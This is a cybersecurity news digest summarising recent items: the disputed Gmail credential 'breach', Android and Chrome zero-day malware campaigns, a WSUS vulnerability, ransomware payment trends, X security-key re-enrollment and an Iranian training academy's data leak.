Daily Brief

Google refuted reports of a major Gmail breach affecting 183 million accounts, attributing the claims to misinterpretation of old credential data. The confusion originated from the addition of a large dataset to Have I Been Pwned, collected from infostealer malware logs over several years. This dataset, shared by Synthient, was mistakenly perceived as a new breach, though it reflects long-term infostealer activity rather than a targeted Gmail attack. Google emphasized that Gmail's security remains robust, with proactive measures in place to scan for stolen credentials and prompt password resets. The incident highlights the rapid spread of misinformation and the importance of context in cybersecurity reporting. Users are advised to enable two-step verification, consider passkeys, and update passwords in response to breach notifications. The situation underscores the need for media literacy and careful interpretation of cybersecurity news to prevent unnecessary panic.

Many startups rely on Google Workspace, which prioritizes collaboration over security, posing risks for lean IT teams tasked with protection. Key security practices include enforcing multi-factor authentication (MFA) and hardening admin access to prevent unauthorized account compromises. Adjusting default sharing settings and controlling OAuth app access are crucial to mitigate data leaks and unauthorized access. Email threats remain a significant concern; implementing robust detection and response mechanisms is essential to counter phishing and impersonation attacks. Proactive monitoring and automated alerts can aid in detecting and containing account takeovers before they escalate. Understanding and classifying sensitive data within Google Workspace is vital, with data loss prevention (DLP) tools offering limited but necessary support. Solutions like Material Security can enhance Google Workspace by providing advanced threat detection and unified security management.

The Institute for Strategic Dialogue (ISD) examined responses from four major AI chatbots, revealing that Russian state-attributed content appeared in up to 25% of war-related queries. Chatbots such as OpenAI's ChatGPT and Google's Gemini were tested across five languages, highlighting concerns over AI's potential role in spreading disinformation. The study found that biased or malicious prompts significantly increased the likelihood of chatbots citing Kremlin-aligned sources, with ChatGPT showing a threefold increase in such cases. Google's Gemini demonstrated the most effective safety measures, featuring fewer Kremlin-aligned sources and recognizing the risks of biased prompts. The ISD's findings suggest that AI models can be manipulated to echo state-sponsored narratives, raising questions about the enforcement of EU regulations against Russian disinformation. The study emphasizes the need for AI firms to implement stricter content moderation and scrutiny to prevent the dissemination of manipulated information. With AI chatbots increasingly used as search engines, the potential impact on public perception and policy enforcement is significant, necessitating regulatory attention.

Herodotus is a new Android malware family using random delay injection to mimic human typing, helping it evade detection by security software. Offered as malware-as-a-service, Herodotus targets Italian and Brazilian users via SMS phishing, exploiting a custom dropper to bypass Android 13's Accessibility restrictions. The malware's 'humanizer' mechanism introduces random delays in text input, making automated actions appear more human-like to avoid behavior-based anti-fraud systems. Threat Fabric identified Herodotus being spread by multiple threat actors, with seven distinct subdomains indicating its growing adoption in the wild. Users are advised to avoid downloading APKs from untrusted sources and ensure Google Play Protect is active, while scrutinizing and revoking risky app permissions. Herodotus' innovative delay tactic represents a novel challenge for current detection systems, emphasizing the need for enhanced behavioral analysis in cybersecurity strategies.

Marks & Spencer replaced Tata Consultancy Services as its IT service desk provider after a procurement process that began in January, aiming to refresh its IT support infrastructure. The decision to switch providers follows a significant cyber incident affecting M&S's operations, notably disrupting Click & Collect orders and impacting profits by an estimated £300 million. The National Crime Agency arrested four individuals in connection with the attack, which targeted M&S and other British retailers over several weeks. Despite the change in service desk providers, TCS continues to support other IT services for M&S, maintaining a strategic partnership. M&S has gradually restored services, including Click & Collect, although some functionalities like Scan and Shop and online stock checking remain affected. The cyber incident has prompted M&S to reassess its IT strategy, reflecting the ongoing challenges in securing retail operations against cyber threats. TCS clarified that vulnerabilities did not originate from their networks, as they do not provide cybersecurity services to M&S, which are managed by another partner.

Kaspersky identified a Chrome zero-day vulnerability (CVE-2025-2783) exploited to deliver LeetAgent spyware, developed by Italian firm Memento Labs, targeting Russian organizations. The flaw, a sandbox escape vulnerability, allowed attackers to execute remote code and distribute espionage tools via phishing emails with personalized links. Operation ForumTroll, active since February 2024, targeted media, universities, research centers, and government bodies in Russia and Belarus, focusing on espionage. Memento Labs, formed from a merger involving HackingTeam, has a history of providing offensive cyber tools to governments and corporations. The attack chain involved a validator script to verify genuine users, followed by exploitation of the zero-day to deploy the LeetAgent malware. LeetAgent connects to command-and-control servers to execute tasks, with links to broader malicious activities dating back to 2022, involving phishing emails. Positive Technologies and BI.ZONE also tracked the activity, noting connections between LeetAgent and the more sophisticated Dante spyware. The campaign underscores the persistent threat posed by advanced spyware and the need for robust defenses against targeted phishing and zero-day exploits.

SideWinder has launched a new campaign targeting South Asian diplomats, including a European embassy in New Delhi, using a ClickOnce-based infection chain. The attack spans multiple organizations in Sri Lanka, Pakistan, and Bangladesh, employing spear-phishing emails with malicious PDF and Word documents. The campaign introduces the use of ModuleInstaller and StealerBot malware, enabling data collection, reverse shell access, and further malware deployment. Attackers employ legitimate applications like MagTek's ReaderConfiguration.exe for side-loading malicious DLLs, complicating detection and analysis. The phishing emails mimic official communications, using domains resembling the Ministry of Defense of Pakistan to enhance credibility. SideWinder's tactics reflect an advanced understanding of geopolitical dynamics, tailoring lures to specific diplomatic targets in the region. The campaign's persistence and sophistication highlight the ongoing threat posed by state-sponsored actors in geopolitical espionage activities.

A critical vulnerability in Windows Server Update Services (WSUS), CVE-2025-59287, is actively exploited, affecting Windows Server versions 2012 through 2025. The flaw enables unauthenticated attackers to execute arbitrary code, with exploitation observed across multiple organizations by a threat actor identified as UNC6512. Despite Microsoft's emergency patch, exploitation continues, with approximately 100,000 hits reported in a week, indicating the patch did not fully resolve the issue. Attackers gain initial access and conduct reconnaissance using PowerShell commands, targeting publicly exposed WSUS instances on default TCP ports 8530 and 8531. Exfiltration of data to remote endpoints has been observed, with the potential for attackers to push malicious software via the update service. Trend Micro and Palo Alto Networks emphasize the vulnerability's catastrophic potential if WSUS is internet-exposed, urging rapid patch deployment and remediation. The situation highlights challenges in patch management and the need for accountability in ensuring security patches effectively address vulnerabilities.

Google addressed false reports claiming a breach of 183 million Gmail accounts, clarifying that no new security incident occurred. The misinformation originated from a misunderstanding of a large collection of compromised credentials added to Have I Been Pwned, not a new breach. This collection included credentials from various past incidents involving malware, phishing, and credential stuffing, affecting multiple platforms. Google reassured users of Gmail's robust security measures and confirmed actions to protect accounts by resetting passwords when necessary. The incident underscores the importance of accurate reporting, as sensationalized claims can cause unnecessary alarm and operational disruptions. Users are advised to check Have I Been Pwned for potential exposure and to change passwords if their credentials appear in the collection. The situation highlights ongoing challenges in managing credential security and the potential risks posed by recycled or exposed passwords.

X mandates users to re-enroll security keys for two-factor authentication (2FA) by November 10, or face account lockouts until compliance. This requirement affects users employing passkeys or hardware-based security keys, such as YubiKeys, which offer phishing-resistant protection. The change is due to X's migration from the twitter.com domain to x.com, rendering current security keys incompatible with the new domain. Users must manually re-enroll their security keys by accessing x.com/settings/account/login_verification/security_keys and confirming their identity with a password. Failure to re-enroll will result in account lockout, with options to either re-enroll, choose a different 2FA method, or opt-out of 2FA. X emphasizes that this is not related to a security breach but is a technical necessity due to domain migration. The initiative underscores the importance of maintaining updated security measures to ensure seamless user access and protection against phishing threats.

Only 23% of ransomware victims paid attackers in Q3 2025, marking a continued decline in payment rates, as organizations enhance their cybersecurity measures and resist extortion demands. Coveware's data shows a shift in ransomware tactics, with 76% of attacks involving data exfiltration, indicating a move away from solely encryption-based extortion. Average and median ransomware payments decreased to $377,000 and $140,000, respectively, reflecting a strategic shift by enterprises to invest in preventive measures. Ransomware groups like Akira and Qilin are targeting medium-sized firms, which are perceived as more likely to pay, accounting for 44% of attacks in the third quarter. Remote access compromise and software vulnerabilities have become prevalent attack vectors, prompting a reevaluation of organizational security strategies. As profits diminish, ransomware gangs are expected to increase precision in targeting, with a potential rise in social engineering and insider threats. The Picus Blue Report 2025 reveals a significant increase in password cracking incidents, urging organizations to bolster password security and monitoring practices.

QNAP has issued an urgent advisory for users to patch a critical ASP.NET Core vulnerability affecting its NetBak PC Agent for Windows. The flaw, identified as CVE-2025-55315, allows attackers to hijack credentials or bypass security controls via HTTP request smuggling. This vulnerability, found in the Kestrel ASP.NET Core web server, poses significant risks, including unauthorized data access and server file modifications. QNAP recommends users update their systems by reinstalling the NetBak PC Agent or manually updating ASP.NET Core components. Microsoft previously addressed this flaw, marking it with the highest severity rating for an ASP.NET Core vulnerability. Successful exploitation can lead to privilege escalation, bypassing CSRF checks, and potential denial-of-service conditions. In addition to this advisory, QNAP recently patched multiple rsync vulnerabilities in its HBS 3 Hybrid Backup Sync solution.

Kaspersky identified Operation ForumTroll, exploiting a Chrome zero-day, targeting Russian organizations with malware linked to Italian vendor Memento Labs. The campaign involved phishing emails with malicious links, compromising systems via a sandbox escape vulnerability, CVE-2025-2783, in Chrome and Firefox. Memento Labs, formed from the assets of the former Hacking Team, developed the Dante spyware, used in these attacks alongside LeetAgent malware. Dante is a modular spyware with command execution, file operations, and data theft capabilities, but its full features remain undisclosed due to missing modules. The malware self-deletes if no command-and-control communication occurs, complicating forensic analysis. Chrome and Firefox have patched the exploited vulnerabilities, with updates released in March 2025. Memento Labs has not responded to inquiries regarding its involvement in these cyber activities.

Ravin Academy, an Iranian institution linked to state-sponsored cyber activities, confirmed a data breach affecting its online platform, exposing personal information of students and associates. Compromised data includes names, phone numbers, Telegram usernames, and in some cases, national ID numbers, potentially impacting individuals' privacy and security. The breach was publicly disclosed via Ravin's Telegram channel, amidst claims of attempts to undermine Iranian cybersecurity credibility and national achievements. UK-based activist Nariman Gharib obtained and published the leaked data, further amplifying the breach's visibility and potential reputational damage. Ravin Academy, sanctioned by Western nations for its role in cyber operations, faces increased scrutiny due to its founders' alleged ties to Iran's Ministry of Intelligence and Security. The incident underscores ongoing geopolitical tensions, with Iran's cyber activities remaining a concern despite being overshadowed by other nation-state threats like China and Russia. The breach serves as a reminder of the persistent threat posed by state-linked cyber entities and the importance of robust security measures to protect sensitive information.

Social media platform X is advising users with security keys to re-enroll by November 10, 2025, to prevent account lockouts. This re-enrollment is necessary due to the rebranding from Twitter to X, affecting the domain association of security keys. Users who fail to re-enroll will face account access issues unless they choose an alternative two-factor authentication (2FA) method. The change is specific to users utilizing hardware security keys, not affecting those using authenticator apps for 2FA. X's initiative aims to phase out the twitter[.]com domain, aligning security keys with the new x[.]com domain. Text message-based 2FA remains available but is restricted to non-Premium subscribers since March 2023. The company's proactive approach emphasizes the importance of maintaining secure access through updated authentication methods.